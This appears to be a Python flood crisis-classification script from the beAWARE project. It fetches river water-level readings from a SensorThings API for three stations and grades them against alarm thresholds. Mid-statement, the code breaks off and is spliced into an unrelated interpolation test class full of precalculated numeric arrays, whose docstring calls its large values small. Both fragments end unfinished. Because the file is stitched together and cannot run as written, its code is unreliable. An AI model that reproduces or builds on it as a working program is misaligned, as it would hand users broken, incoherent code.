<reponame>beAWARE-project/crisis-classification<gh_stars>0 # Created Date: 11/09/2018 # Modified Date: 12/09/2018 # # Implements the 2nd algorithm of Crisis Classification module # based on the measurements of water levels from sensors for a # specific 3 weather stations at a) last measurement # or b) at particular date/time period. # If flag_phenTime = True, then the phenomenonTime of each Weather Station will be considered, # otherwise the specific dates/time period will be examined # #---------------------------------------------------------------------------------------------------------- # Inputs: a) Time series of measurements of water levels by the sensors # for a specific weather station at last measurement (date/time) # b) Thresholds for the particular specific weather station and for water river level # # Outputs: TOP104_METRIC_REPORT for each Weather Station and Datastream, which contains: # a) the actual crisis level associated to the sensor position # b) a metric-scale from 0 to 3 depending on whether the actual value exceeds a # particular alarm threshold. 
# # Algorithm 2 from Crisis Classification (based on AAWA) #---------------------------------------------------------------------------------------------------------- # from bus.bus_producer import BusProducer import json, time from datetime import datetime, timedelta import os, errno import numpy as np from pathlib import Path from CRCL.FloodCRisisCLassification.Topic104_Metric_Report import Top104_Metric_Report from CRCL.FloodCRisisCLassification.Create_Queries import extract_from_WS_Sensors, extract_stations_river, extract_forecasts, extract_station_datastream, extract_station_location from collections import OrderedDict from CRCL.FloodCRisisCLassification.Auxiliary_functions import * from CRCL.FloodCRisisCLassification.topic104Flood import * def CrisisClassificationFlood_Emerg(): ver = 'Ver8_2nd_Period' # Create a directory to store the output files and TOPICS #root_path = Path.cwd() # Create a path current_dirs_parent = os.getcwd() root_path = current_dirs_parent + "/" + "CRCL/FloodCRisisCLassification" + "/" now = datetime.now() directory = root_path + "TOPICS_fromSensors_2010" + "_" + ver + "_" + str(now.year) + "_" + str(now.month) + "_" + str(now.day) os.makedirs(directory, exist_ok=True) #----------------------------------------------------------------------------------- # Fetch data from the OGC SensorThings API # # User defined values in order to formulate the query # service_root_URI = 'https://beaware.server.de/SensorThingsService/v1.0/' SensorThingEntities = ['Things', 'Locations', 'HistoricalLocations', 'Datastreams', 'Sensor', 'Observations', 'ObservedProperties', 'FeaturesOfInterest', 'MultiDatastreams'] SensorThings = [SensorThingEntities[0], SensorThingEntities[3], SensorThingEntities[5]] # Initialise arrays to store the results of comparison for each weather station and each datastream (WL or PR) meas_ColNote_WL = [] meas_ColNote_PR = [] #-------------------------------------------------------------------------------------- # Creates the 
thresholds for each one of the Weather Stations of interest # Weather_Stations_Ids = [45, 47, 374] Thresholds_WL = [{'ID': 45, 'Alarm1': 4.36, 'Alarm2': 4.86, 'Alarm3': 5.66}, {'ID': 47, 'Alarm1': 3.00, 'Alarm2': 4.60, 'Alarm3': 5.40}, {'ID': 374, 'Alarm1': 1.63, 'Alarm2': 3.03, 'Alarm3': 3.43} ] #Thresholds_PR = [{'ID': 47, 'Alarm1': 50, 'Alarm2': 100, 'Alarm3': 150}, # {'ID': 49, 'Alarm1': 50, 'Alarm2': 100, 'Alarm3': 150}, # {'ID': 374, 'Alarm1': 50, 'Alarm2': 100, 'Alarm3': 150} # ] # PEIRAGMENA THRESHOLDS #Thresholds_WL = [{'ID': 45, 'Alarm1': 0.36, 'Alarm2': 0.6, 'Alarm3': 0.66}, # {'ID': 47, 'Alarm1': 0.01, 'Alarm2': 0.60, 'Alarm3': 0.80}, # {'ID': 374, 'Alarm1': 0.03, 'Alarm2': 0.03, 'Alarm3': 0.43} # ] # Start Timing Step 1 start_step1 = time.time() # Store the time steps time_duration_step = [] #--------------------------------------------------------------------------------------------------- # Step 1: Extracts the weather stations where have as Datastreams the Water Level flag_last_measurement = True # or False # List of dictionaries contains the id of each WS and its one of the Datastreams. 
# For WS where one of the Datastreams is missing the None value is filled WSDS = [] # dates_WL=[] # flag_phenTime = True # Specify the period date/time for each Weather Station flag_phenTime = False #dates_WL = [{'ID': 45, 'PhenDateTime': ['2010-10-31T21:00:00.000Z', '2010-11-02T22:00:00.000Z']}, # {'ID': 47, 'PhenDateTime': ['2010-10-31T19:00:00.000Z', '2010-11-02T23:00:00.000Z']}, # {'ID': 374, 'PhenDateTime': ['2010-10-31T13:00:00.000Z', '2010-11-02T23:00:00.000Z']} # ] dates_WL = [{'ID': 45, 'PhenDateTime': ['2010-11-01T07:00:00.000Z']}, {'ID': 47, 'PhenDateTime': ['2010-11-01T10:00:00.000Z']}, {'ID': 374, 'PhenDateTime': ['2010-11-02T12:00:00.000Z']} ] for i, StationID in enumerate(Weather_Stations_Ids): WSDS_dict = {'ID': StationID} # extract the location of the station SensThings_Loc = [SensorThingEntities[0], SensorThingEntities[1]] selVals = {'thing_sel': ['id', 'name'], 'loc_sel': ['location']} filt_args = {'thing_filt': ['id']} filt_vals = {'thing_filt': str(StationID)} resp_station_loc = extract_station_location(service_root_URI, SensThings_Loc, selVals, filt_args, filt_vals) SensThings = [SensorThingEntities[0], SensorThingEntities[3]] selVals = {'dstr_sel': ['id', 'name', 'phenomenonTime']} filt_args={'thing_filt': ['id'], 'dstr_filt': ['name']} filt_vals_WL={'thing_filt': str(StationID), 'dstr_filt': ['Water']} resp_station_datastream_WL = extract_station_datastream(service_root_URI, SensThings, selVals, filt_args, filt_vals_WL) # Update WSDS with Weather Station name WSDS_dict.update({'WS_name': resp_station_datastream_WL['value'][0]['name']}) # Keep elements and values for Water Level if len(resp_station_datastream_WL['value'][0]['Datastreams']) == 0: WSDS_dict.update({'WL': None}) WSDS_dict.update({'WL_name': None}) else: WSDS_dict.update({'WL': resp_station_datastream_WL['value'][0]['Datastreams'][0]['@iot.id']}) WSDS_dict.update({'WL_name': resp_station_datastream_WL['value'][0]['Datastreams'][0]['name']}) # Update the date/time equal with the 
phenomononTime if flag_phenTime == True: dates_WL_dict = {'ID': StationID} PhenDateTime = resp_station_datastream_WL['value'][0]['Datastreams'][0]['phenomenonTime'] dates_WL_dict.update({'PhenDateTime': PhenDateTime[(PhenDateTime.find("/")+1):] }) dates_WL += [dates_WL_dict] # Add station's location to WSDS_dict WSDS_dict.update({'Coordinates': resp_station_loc['value'][0]['Locations'][0]['location']['coordinates']}) # Update the WSDS with the new dictionary for the WS WSDS += [ WSDS_dict ] # print("\n ----------------------- ") # print("WSDS =", WSDS ) # print("--------------------------\n") # End Timing Step 1 end_step1 = time.time() time_duration_step.append( end_step1 - start_step1 ) #----------------------------------------------------------------------------------- # Step 2: Extract real measurements from Sensors at the specific Weather Station # and # Step 3: Create and send the Topic104 #----------------------------------------------------------------------------------- # Start Timing Step 2 start_step2 = time.time() # Open files to store the query responses flname_WL = directory + "/" + 'response_Sensors_WL.txt' outfl_WL = open(flname_WL, 'w') # Arrays to keep the query responses response_sensors_WL = [] # List to store all the Topics 104 Topics104 = [] for i, StationID in enumerate(WSDS): filt_args={'thing_filt': ['id'], 'dstr_filt': ['name'], 'obs_filt': ['phenomenonTime']} sel_vals = {'thing_sel': ['id','name', 'description'], 'dstr_sel': ['id', 'name', 'phenomenonTime'], 'obs_sel': ['result', 'phenomenonTime', 'id']} ord_vals = ['phenomenonTime'] # For WL datastream do: if StationID['WL'] != None: # Find the corresponding PhenomenonTimeDate for WL of the Station for k, j in enumerate(dates_WL): if j['ID'] == StationID['ID']: if len(j) > 1: #['PhenDateTime'] != None: dt = j['PhenDateTime'] filt_vals_WL={'thing_filt': [str(StationID['ID'])], 'dstr_filt': ['Water'], 'obs_filt_vals': dt} # Call function to extract the measurement of WL from specific 
Station item_WL = extract_from_WS_Sensors(service_root_URI, SensorThings, sel_vals, ord_vals, filt_args, filt_vals_WL) response_sensors_WL.append(item_WL) msg_WL = "\n Station ID = " + str(StationID['ID']) + " and Datastream ID = " + str(StationID['WL']) + "\n" outfl_WL.write(msg_WL) json.dump(item_WL, outfl_WL) outfl_WL.write("\n ------------------------------ \n") # For each observation CRCL finds its scale lenObs = len(item_WL['value'][0]['Datastreams'][0]['Observations']) value = [] for iter_obs in range(0, lenObs): value.append(item_WL['value'][0]['Datastreams'][0]['Observations'][iter_obs]['result']) # call function to compare the value with alarm thresholds if value[iter_obs] > 0.0: color_note_WL = compare_value_scale_thresholds(value[iter_obs] , filt_vals_WL['thing_filt'], filt_vals_WL['dstr_filt'], Thresholds_WL) meas_ColNote_WL_dict = {'ID': StationID['ID'], 'col': color_note_WL[0], 'note': color_note_WL[1], 'scale': color_note_WL[2], 'note_scale': color_note_WL[3]} else: # StationID['WL'] == None: meas_ColNote_WL_dict = {'ID': StationID['ID'], 'col': None, 'note': None, 'scale': None, 'note_scale': None} meas_ColNote_WL += [meas_ColNote_WL_dict] # print("\n ----------------------- ") # print("meas_ColNote_WL =", meas_ColNote_WL ) # print("--------------------------\n") #-------------------------------------------------------------------------------------------- # STEP 3: Creates the TOPIC_104_METRIC_REPORT #-------------------------------------------------------------------------------------------- # # Create the TOPIC 104 (json format) for each Weather Station and datastream # Water Level. The datastream will be consisted of real values # retrieved from the sensors at a particular Weather Station and another dataSeries # metric which presents the scale. 
# Set variables for the header of the message district = "Vicenza" sent_dateTime = datetime.utcnow().replace(microsecond=0).isoformat() + 'Z' status = "Actual" actionType = "Update" scope = "Public" code = 20190617001 # Set variables for the body of the message dataStreamGener = "CRCL" lang = "en-US" dataStreamCategory = "Met" dataStreamSubCategory = "Flood" # Position of the Weather Station position = [ StationID['Coordinates'][0], StationID['Coordinates'][1] ] #------------------------------------------------------------------------- # If the Water Level datastream exist in the specific Weather Station # Initialize temporary arrays measurement_ID = [] measurement_TimeStamp = [] dataSeriesID = [] dataSeriesName = [] dsmeas_color = [] dsmeas_note = [] yValues = [] xVals = [] if StationID['WL'] != None: dataStreamName = 'OWLm_Observed Water Level Measurement' dataStreamDescript = StationID['WL_name'] + ' ,real measurement' dataStreamID = "FLCR_1012_OWLm" #print("\n dataStreamName = ", dataStreamName, " dataStreamID = ", dataStreamID) # Unique message identifier msgIdent = datetime.utcnow().isoformat().replace(":","").replace("-","").replace(".","MS") # Call the class Top104_Metric_Report to create an object data of this class data_WL = Top104_Metric_Report(msgIdent, sent_dateTime, status, actionType, scope, district, code, dataStreamGener, dataStreamID, dataStreamName, dataStreamDescript, lang, dataStreamCategory, dataStreamSubCategory, position) # Create the header of the object (message) data_WL.create_dictHeader() # Create the body and the measurements of the object (message) # # Extract values from 'response_sensors_WL' pos = [j for j, x in enumerate(response_sensors_WL) if x['value'][0]['@iot.id'] == StationID['ID'] ] val_measurement_ID = str(response_sensors_WL[pos[0]]['value'][0]['Datastreams'][0]['Observations'][0]['@iot.id']) + "_1" measurement_ID += [ val_measurement_ID ] measurement_TimeStamp += [ datetime.utcnow().replace(microsecond=0).isoformat() + 'Z' 
] # find the position of station and datasteam to the meas_ColNote_WL list pos_meas = [j for j, x in
7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 1.385029207141E-02, -4.488982302467E-02, -8.350115450764E-02, -7.975908114097E-02, -5.651707329729E-02, -4.876973734940E-02, -5.651707329729E-02, -7.975908114097E-02, -8.350115450764E-02, -4.488982302467E-02, 1.385029207141E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 1.385029207141E-02, -4.488982302467E-02, -8.350115450764E-02, -7.975908114097E-02, -5.651707329729E-02, -4.876973734940E-02, -5.651707329729E-02, -7.975908114097E-02, -8.350115450764E-02, -4.488982302467E-02, 1.385029207141E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02], dtype=np.float64 ) #: array holding precalculated linear extrapolation data self.precalc_extrapolation_linear: np.array = np.array( [5.663043205226E-01, 6.276115134204E-01, 6.889187063182E-01, 7.502258992160E-01, 7.655526974405E-01, -3.424867714738E-02, -1.065498256289E+00, -1.744516071724E+00, -1.668065798131E+00, -1.642582373601E+00, -1.668065798131E+00, -1.744516071724E+00, -1.065498256289E+00, -3.424867714738E-02, 7.655526974405E-01, 7.502258992160E-01, 6.889187063182E-01, 6.276115134204E-01, 5.663043205226E-01, 6.276115134204E-01, 5.929572720554E-01, 5.583030306904E-01, 5.236487893254E-01, 5.149852289841E-01, -3.779572577314E-02, -7.381658890282E-01, -1.189597074863E+00, -1.130882889853E+00, -1.111311494850E+00, -1.130882889853E+00, -1.189597074863E+00, -7.381658890282E-01, -3.779572577314E-02, 5.149852289841E-01, 5.236487893254E-01, 5.583030306904E-01, 5.929572720554E-01, 6.276115134204E-01, 6.889187063182E-01, 5.583030306904E-01, 4.276873550626E-01, 2.970716794347E-01, 2.644177605278E-01, -4.134277439891E-02, -4.108335217679E-01, -6.346780780020E-01, -5.936999815753E-01, -5.800406160998E-01, -5.936999815753E-01, -6.346780780020E-01, 
-4.108335217679E-01, -4.134277439891E-02, 2.644177605278E-01, 2.970716794347E-01, 4.276873550626E-01, 5.583030306904E-01, 6.889187063182E-01, 7.502258992160E-01, 5.236487893254E-01, 2.970716794347E-01, 2.970716794347E-01, 5.236487893254E-01, 7.502258992160E-01, 7.655526974405E-01, 5.149852289841E-01, 2.644177605278E-01, 2.644177605278E-01, 5.149852289841E-01, 7.655526974405E-01, -3.424867714738E-02, -3.779572577314E-02, -4.134277439891E-02, -4.134277439891E-02, -3.779572577314E-02, -3.424867714738E-02, -1.065498256289E+00, -7.381658890282E-01, -4.108335217679E-01, -4.108335217679E-01, -7.381658890282E-01, -1.065498256289E+00, -1.744516071724E+00, -1.189597074863E+00, -6.346780780020E-01, -6.346780780020E-01, -1.189597074863E+00, -1.744516071724E+00, -1.668065798131E+00, -1.130882889853E+00, -5.936999815753E-01, -5.936999815753E-01, -1.130882889853E+00, -1.668065798131E+00, -1.642582373601E+00, -1.111311494850E+00, -5.800406160998E-01, -5.800406160998E-01, -1.111311494850E+00, -1.642582373601E+00, -1.668065798131E+00, -1.130882889853E+00, -5.936999815753E-01, -5.936999815753E-01, -1.130882889853E+00, -1.668065798131E+00, -1.744516071724E+00, -1.189597074863E+00, -6.346780780020E-01, -6.346780780020E-01, -1.189597074863E+00, -1.744516071724E+00, -1.065498256289E+00, -7.381658890282E-01, -4.108335217679E-01, -4.108335217679E-01, -7.381658890282E-01, -1.065498256289E+00, -3.424867714738E-02, -3.779572577314E-02, -4.134277439891E-02, -4.134277439891E-02, -3.779572577314E-02, -3.424867714738E-02, 7.655526974405E-01, 5.149852289841E-01, 2.644177605278E-01, 2.644177605278E-01, 5.149852289841E-01, 7.655526974405E-01, 7.502258992160E-01, 5.236487893254E-01, 2.970716794347E-01, 2.970716794347E-01, 5.236487893254E-01, 7.502258992160E-01, 6.889187063182E-01, 5.583030306904E-01, 4.276873550626E-01, 2.970716794347E-01, 2.644177605278E-01, -4.134277439891E-02, -4.108335217679E-01, -6.346780780020E-01, -5.936999815753E-01, -5.800406160998E-01, -5.936999815753E-01, 
-6.346780780020E-01, -4.108335217679E-01, -4.134277439891E-02, 2.644177605278E-01, 2.970716794347E-01, 4.276873550626E-01, 5.583030306904E-01, 6.889187063182E-01, 6.276115134204E-01, 5.929572720554E-01, 5.583030306904E-01, 5.236487893254E-01, 5.149852289841E-01, -3.779572577314E-02, -7.381658890282E-01, -1.189597074863E+00, -1.130882889853E+00, -1.111311494850E+00, -1.130882889853E+00, -1.189597074863E+00, -7.381658890282E-01, -3.779572577314E-02, 5.149852289841E-01, 5.236487893254E-01, 5.583030306904E-01, 5.929572720554E-01, 6.276115134204E-01, 5.663043205226E-01, 6.276115134204E-01, 6.889187063182E-01, 7.502258992160E-01, 7.655526974405E-01, -3.424867714738E-02, -1.065498256289E+00, -1.744516071724E+00, -1.668065798131E+00, -1.642582373601E+00, -1.668065798131E+00, -1.744516071724E+00, -1.065498256289E+00, -3.424867714738E-02, 7.655526974405E-01, 7.502258992160E-01, 6.889187063182E-01, 6.276115134204E-01, 5.663043205226E-01], dtype=np.float64 ) class TestInterpolatorLoadBigValues(TestInterpolatorLoadValues): """ Loading small values (10^-20 times the original) instead of the original 2D sinc function test. For description of data storage, see TestInterpolatorLoadValues. """ def __init__(self): super().__init__() #: data array from a function sampled on self.x. 
dtype should be np.float64 # self.data: np.array = np.sin(self.x) self.data: np.array = np.array( [[7.049456954407E+18, -5.031133752816E+17, -8.474851229653E+18, -7.975908114097E+18, -4.876973734940E+18, -4.876973734940E+18, -7.975908114097E+18, -8.474851229653E+18, -5.031133752816E+17, 7.049456954407E+18], [-5.031133752816E+17, -9.121921863446E+18, -9.251264987298E+16, 1.052139178127E+19, 1.283205555674E+19, 1.283205555674E+19, 1.052139178127E+19, -9.251264987298E+16, -9.121921863446E+18, -5.031133752816E+17], [-8.474851229653E+18, -9.251264987298E+16, 1.283205555674E+19, 1.734970013481E+18, -1.140407180451E+19, -1.140407180451E+19, 1.734970013481E+18, 1.283205555674E+19, -9.251264987298E+16, -8.474851229653E+18], [-7.975908114097E+18, 1.052139178127E+19, 1.734970013481E+18, -2.145503300375E+19, -9.241435356589E+18, -9.241435356589E+18, -2.145503300375E+19, 1.734970013480E+18, 1.052139178127E+19, -7.975908114097E+18], [-4.876973734940E+18, 1.283205555674E+19, -1.140407180451E+19, -9.241435356589E+18, 6.446759109720E+19, 6.446759109720E+19, -9.241435356589E+18, -1.140407180451E+19, 1.283205555674E+19, -4.876973734940E+18], [-4.876973734940E+18, 1.283205555674E+19, -1.140407180451E+19, -9.241435356589E+18, 6.446759109720E+19, 6.446759109720E+19, -9.241435356589E+18, -1.140407180451E+19, 1.283205555674E+19, -4.876973734940E+18], [-7.975908114097E+18, 1.052139178127E+19, 1.734970013481E+18, -2.145503300375E+19, -9.241435356589E+18, -9.241435356589E+18, -2.145503300375E+19, 1.734970013480E+18, 1.052139178127E+19, -7.975908114097E+18], [-8.474851229653E+18, -9.251264987298E+16, 1.283205555674E+19, 1.734970013480E+18, -1.140407180451E+19, -1.140407180451E+19, 1.734970013480E+18, 1.283205555674E+19, -9.251264987296E+16, -8.474851229653E+18], [-5.031133752816E+17, -9.121921863446E+18, -9.251264987298E+16, 1.052139178127E+19, 1.283205555674E+19, 1.283205555674E+19, 1.052139178127E+19, -9.251264987296E+16, -9.121921863446E+18, -5.031133752816E+17], [7.049456954407E+18, 
-5.031133752816E+17, -8.474851229653E+18, -7.975908114097E+18, -4.876973734940E+18, -4.876973734940E+18, -7.975908114097E+18, -8.474851229653E+18, -5.031133752816E+17, 7.049456954407E+18]], dtype=np.float64 ) #: array holding precalculated quadratic extrapolation data self.precalc_extrapolation_quadratic: np.array = np.array( [], dtype=np.float64 ) def setup_cubic(self): self.precalc_interpolation = np.array( [[7.049456954460E+18, 1.414501923721E+18, -4.992201892784E+18, -9.006647501706E+18, -7.975908114096E+18, -5.494750801436E+18, -4.489606937545E+18, -5.494750801434E+18, -7.975908114100E+18, -9.006647501698E+18, -4.992201892788E+18, 1.414501923683E+18, 7.049456954376E+18], [1.414501923764E+18, -6.879873015236E+18, -6.604387574162E+18, -9.273861048722E+16, 7.815453486867E+18, 1.087722976395E+19, 1.179639375775E+19, 1.087722976395E+19, 7.815453486864E+18, -9.273861048516E+16, -6.604387574163E+18, -6.879873015260E+18, 1.414501923709E+18], [-4.992201892782E+18, -6.604387574159E+18, 7.662704616480E+17, 8.927226959209E+18, 8.733637329413E+18, 3.144134389938E+18, 8.046419412828E+17, 3.144134389934E+18, 8.733637329421E+18, 8.927226959216E+18, 7.662704616522E+17, -6.604387574177E+18, -4.992201892789E+18], [-9.006647501668E+18, -9.273861045643E+16, 8.927226959223E+18, 9.500724468548E+18, -3.879550824799E+18, -1.262756473835E+19, -1.571105597160E+19, -1.262756473838E+19, -3.879550824803E+18, 9.500724468565E+18, 8.927226959332E+18, -9.273861058776E+16, -9.006647501760E+18], [-7.975908114094E+18, 7.815453486869E+18, 8.733637329383E+18, -3.879550824786E+18, -2.145503300374E+19, -1.226583807440E+19, -7.714735650690E+18, -1.226583807425E+19, -2.145503300392E+19, -3.879550825037E+18, 8.733637328991E+18, 7.815453486779E+18, -7.975908114134E+18], [-5.494750801433E+18, 1.087722976395E+19, 3.144134389889E+18, -1.262756473834E+19, -1.226583807434E+19, 3.691392206497E+19, 5.727262813613E+19, 3.691392206533E+19, -1.226583807459E+19, -1.262756473889E+19, 3.144134390513E+18, 
1.087722976389E+19, -5.494750801509E+18], [-4.489606937542E+18, 1.179639375775E+19, 8.046419412881E+17, -1.571105597160E+19, -7.714735650701E+18, 5.727262813612E+19, 8.385571378575E+19, 5.727262813618E+19, -7.714735650696E+18, -1.571105597161E+19, 8.046419412838E+17, 1.179639375773E+19, -4.489606937591E+18], [-5.494750801434E+18, 1.087722976395E+19, 3.144134390093E+18, -1.262756473833E+19, -1.226583807460E+19, 3.691392206464E+19, 5.727262813614E+19, 3.691392206388E+19, -1.226583807413E+19, -1.262756473809E+19, 3.144134391132E+18, 1.087722976399E+19, -5.494750801389E+18], [-7.975908114416E+18, 7.815453486610E+18, 8.733637329526E+18, -3.879550824930E+18, -2.145503300385E+19, -1.226583807444E+19, -7.714735650699E+18, -1.226583807452E+19, -2.145503300371E+19, -3.879550825350E+18, 8.733637329826E+18, 7.815453486864E+18, -7.975908110886E+18], [-9.006647502091E+18, -9.273861080508E+16, 8.927226959362E+18, 9.500724468432E+18, -3.879550824923E+18, -1.262756473862E+19, -1.571105597161E+19, -1.262756473885E+19, -3.879550824244E+18, 9.500724467988E+18, 8.927226956139E+18, -9.273860862352E+16, -9.006647499242E+18], [-4.992201892748E+18, -6.604387574117E+18, 7.662704614151E+17, 8.927226959268E+18, 8.733637329008E+18, 3.144134390448E+18, 8.046419412263E+17, 3.144134389968E+18, 8.733637329917E+18, 8.927226958675E+18, 7.662704629822E+17, -6.604387573416E+18, -4.992201892348E+18], [1.414501923439E+18, -6.879873015445E+18, -6.604387573988E+18, -9.273861059517E+16, 7.815453486837E+18, 1.087722976397E+19, 1.179639375772E+19, 1.087722976397E+19, 7.815453486894E+18, -9.273860926067E+16, -6.604387573672E+18, -6.879873017304E+18, 1.414501925358E+18], [7.049456954108E+18, 1.414501923499E+18, -4.992201892571E+18, -9.006647501872E+18, -7.975908114100E+18, -5.494750801478E+18, -4.489606937572E+18, -5.494750801431E+18, -7.975908113487E+18, -9.006647502955E+18, -4.992201893463E+18, 1.414501925348E+18, 7.049456956398E+18]], dtype=np.float64 ) self.precalc_extrapolation_nearest: np.array = 
np.array( [7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 1.414501923721E+18, -4.992201892784E+18, -9.006647501706E+18, -7.975908114096E+18, -5.494750801436E+18, -4.489606937545E+18, -5.494750801434E+18, -7.975908114100E+18, -9.006647501698E+18, -4.992201892788E+18, 1.414501923683E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 1.414501923721E+18, -4.992201892784E+18, -9.006647501706E+18, -7.975908114096E+18, -5.494750801436E+18, -4.489606937545E+18, -5.494750801434E+18, -7.975908114100E+18, -9.006647501698E+18, -4.992201892788E+18, 1.414501923683E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 1.414501923721E+18, -4.992201892784E+18, -9.006647501706E+18, -7.975908114096E+18, -5.494750801436E+18, -4.489606937545E+18, -5.494750801434E+18, -7.975908114100E+18, -9.006647501698E+18, -4.992201892788E+18, 1.414501923683E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 1.414501923764E+18, 1.414501923764E+18, 1.414501923764E+18, 1.414501923709E+18, 1.414501923709E+18, 1.414501923709E+18, -4.992201892782E+18, -4.992201892782E+18, -4.992201892782E+18, -4.992201892789E+18, -4.992201892789E+18, -4.992201892789E+18, -9.006647501668E+18, -9.006647501668E+18, -9.006647501668E+18, -9.006647501760E+18, -9.006647501760E+18, -9.006647501760E+18, -7.975908114094E+18, -7.975908114094E+18, -7.975908114094E+18, -7.975908114134E+18, -7.975908114134E+18, -7.975908114134E+18, -5.494750801433E+18, -5.494750801433E+18, -5.494750801433E+18, -5.494750801509E+18, -5.494750801509E+18, -5.494750801509E+18, -4.489606937542E+18, -4.489606937542E+18, -4.489606937542E+18, 
-4.489606937591E+18, -4.489606937591E+18, -4.489606937591E+18, -5.494750801434E+18, -5.494750801434E+18, -5.494750801434E+18, -5.494750801389E+18, -5.494750801389E+18, -5.494750801389E+18, -7.975908114416E+18, -7.975908114416E+18, -7.975908114416E+18, -7.975908110886E+18, -7.975908110886E+18, -7.975908110886E+18, -9.006647502091E+18, -9.006647502091E+18, -9.006647502091E+18, -9.006647499242E+18, -9.006647499242E+18, -9.006647499242E+18, -4.992201892748E+18, -4.992201892748E+18, -4.992201892748E+18, -4.992201892348E+18, -4.992201892348E+18, -4.992201892348E+18, 1.414501923439E+18, 1.414501923439E+18, 1.414501923439E+18, 1.414501925358E+18, 1.414501925358E+18, 1.414501925358E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 1.414501923499E+18, -4.992201892571E+18, -9.006647501872E+18, -7.975908114100E+18, -5.494750801478E+18, -4.489606937572E+18, -5.494750801431E+18, -7.975908113487E+18, -9.006647502955E+18, -4.992201893463E+18, 1.414501925348E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 1.414501923499E+18, -4.992201892571E+18, -9.006647501872E+18, -7.975908114100E+18, -5.494750801478E+18, -4.489606937572E+18, -5.494750801431E+18, -7.975908113487E+18, -9.006647502955E+18, -4.992201893463E+18, 1.414501925348E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 1.414501923499E+18, -4.992201892571E+18, -9.006647501872E+18, -7.975908114100E+18, -5.494750801478E+18, -4.489606937572E+18, -5.494750801431E+18, -7.975908113487E+18, -9.006647502955E+18, -4.992201893463E+18, 1.414501925348E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18], dtype=np.float64 ) #: 
array holding precalculated linear extrapolation data self.precalc_extrapolation_linear: np.array = np.array( [5.663043205226E+19, 6.276115134204E+19, 6.889187063182E+19, 7.502258992160E+19, 8.801800967422E+19, 2.361337399095E+18, -1.138639225842E+20, -1.744516071724E+20, -1.684506962764E+20, -1.629840661335E+20, -1.684506962764E+20, -1.744516071724E+20, -1.138639225842E+20, 2.361337399095E+18, 8.801800967422E+19, 7.502258992160E+19, 6.889187063182E+19, 6.276115134204E+19, 5.663043205226E+19, 6.276115134204E+19, 5.929572720554E+19, 5.583030306904E+19, 5.236487893254E+19, 5.915017375739E+19, -8.984236486837E+16, -7.891149755669E+19, -1.189597074863E+20, -1.141320477848E+20, -1.101525797349E+20, -1.141320477848E+20, -1.189597074863E+20, -7.891149755669E+19, -8.984236486841E+16, 5.915017375739E+19, 5.236487893254E+19, 5.583030306904E+19, 5.929572720554E+19, 6.276115134204E+19, 6.889187063182E+19, 5.583030306904E+19, 4.276873550626E+19, 2.970716794347E+19, 3.028233784055E+19, -2.541022128832E+18, -4.395907252919E+19, -6.346780780020E+19, -5.981339929310E+19, -5.732109333620E+19, -5.981339929310E+19, -6.346780780020E+19, -4.395907252919E+19, -2.541022128832E+18, 3.028233784055E+19, 2.970716794347E+19, 4.276873550626E+19, 5.583030306904E+19, 6.889187063182E+19, 7.502258992160E+19, 5.236487893254E+19, 2.970716794347E+19, 2.970716794347E+19, 5.236487893254E+19, 7.502258992160E+19, 8.801800967422E+19, 5.915017375739E+19, 3.028233784055E+19, 3.028233784055E+19, 5.915017375739E+19, 8.801800967422E+19, 2.361337399095E+18, -8.984236486837E+16, -2.541022128832E+18, -2.541022128832E+18, -8.984236486841E+16, 2.361337399095E+18, -1.138639225842E+20, -7.891149755669E+19, -4.395907252919E+19, -4.395907252919E+19, -7.891149755669E+19, -1.138639225842E+20, -1.744516071724E+20, -1.189597074863E+20, -6.346780780020E+19, -6.346780780020E+19, -1.189597074863E+20, -1.744516071724E+20, -1.684506962764E+20, -1.141320477848E+20, -5.981339929310E+19, -5.981339929310E+19, -1.141320477848E+20, 
-1.684506962764E+20, -1.629840661335E+20, -1.101525797349E+20, -5.732109333620E+19, -5.732109333620E+19, -1.101525797349E+20, -1.629840661335E+20, -1.684506962764E+20, -1.141320477848E+20, -5.981339929310E+19, -5.981339929310E+19, -1.141320477848E+20, -1.684506962764E+20, -1.744516071724E+20, -1.189597074863E+20, -6.346780780020E+19, -6.346780780020E+19, -1.189597074863E+20, -1.744516071724E+20, -1.138639225842E+20, -7.891149755669E+19, -4.395907252919E+19, -4.395907252920E+19, -7.891149755669E+19, -1.138639225842E+20, 2.361337399095E+18, -8.984236486840E+16, -2.541022128832E+18, -2.541022128832E+18, -8.984236486853E+16, 2.361337399095E+18, 8.801800967422E+19, 5.915017375739E+19, 3.028233784055E+19, 3.028233784055E+19, 5.915017375739E+19, 8.801800967422E+19, 7.502258992160E+19, 5.236487893254E+19, 2.970716794347E+19, 2.970716794347E+19, 5.236487893254E+19, 7.502258992161E+19, 6.889187063182E+19, 5.583030306904E+19, 4.276873550626E+19, 2.970716794347E+19, 3.028233784055E+19, -2.541022128832E+18, -4.395907252919E+19, -6.346780780020E+19, -5.981339929310E+19, -5.732109333620E+19, -5.981339929310E+19, -6.346780780020E+19, 